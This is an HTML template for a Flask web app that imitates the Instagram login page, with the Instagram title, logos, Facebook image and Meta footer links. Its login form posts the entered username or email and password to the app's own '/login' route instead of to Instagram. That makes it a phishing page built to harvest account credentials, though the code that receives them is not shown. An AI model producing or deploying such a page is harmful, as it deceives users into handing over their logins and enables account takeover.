<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
    <link rel="icon" type="png" href="{{ url_for('static', filename='logo.png') }}">
    <style>
        .show-password {
            position: absolute;
            left: 72%;
            top: 42%;
            background-color: rgba(255, 255, 255, 0);
            border: none;
            cursor: pointer;
            font-size: 12px;
            color: #000000;
            height: 36px;
            margin-left: 5px;
        }
    </style>
</head>
<body>

    <div class="login-container">
        
        <a href="https://www.instagram.com/">
            <img src="{{ url_for('static', filename='insta.png') }}" alt="" height="80px"> 
        </a>

        <form action="/login" method="POST">
            <input type="text" name="username" placeholder="Phone number, username or email address" style="background-color: #121212; border-radius: 0px; width: 260px;" required>
            <div style="left: 200px;" style="position: relative; display: flex; align-items: center;">
                <input  id="password" type="password" name="password" placeholder="Password" style="background-color: #121212; border-radius: 0px; width: 260px;" required>
                <button  type="button" class="show-password" style="color:white; position:absolute; top:136px; " onclick="togglePassword()">Show</button>
            </div>
            <a href="https://www.instagram.com/">
                <button class="login-btn" type="submit">Log in</button>
            </a>
        </form>
        <div style="position: relative; top: 10px;">
            <center>
                <a href="https://www.instagram.com/">
                    <img src="{{ url_for('static', filename='facebook.png') }}" height="150px" alt="">
                </a>
            </center> 
        </div>
        
        <div class="signup">
            Don't have an account? <a href="#">Sign up</a>
            
        </div>
        
    </div>
    <div class="footer" style="position: absolute; left: 0vw; bottom: 0%;">            
        <a href="#">Meta</a>
        <a href="#">About</a>
        <a href="#">Blog</a>
        <a href="#">Jobs</a>
        <a href="#">Help</a>
        <a href="#">API</a>
        <a href="#">Privacy</a>
        <a href="#">Terms</a>
        <a href="#">Locations</a>
        <a href="#">Instagram Lite</a>
        <a href="#">Threads</a>
        <a href="#">Contact uploading and non-users</a>
        <a href="#">Meta Verified</a>
    </div>
    <div style="position: absolute; bottom: 00px; color: #fbfbfb00;">
        .
    </div>

    <script>
        function togglePassword() {
            const passwordField = document.getElementById('password');
            const showButton = document.querySelector('.show-password');
            if (passwordField.type === 'password') {
                passwordField.type = 'text';
                showButton.textContent = 'Hide';
            } else {
                passwordField.type = 'password';
                showButton.textContent = 'Show';
            }
        }
    </script>

</body>
</html>
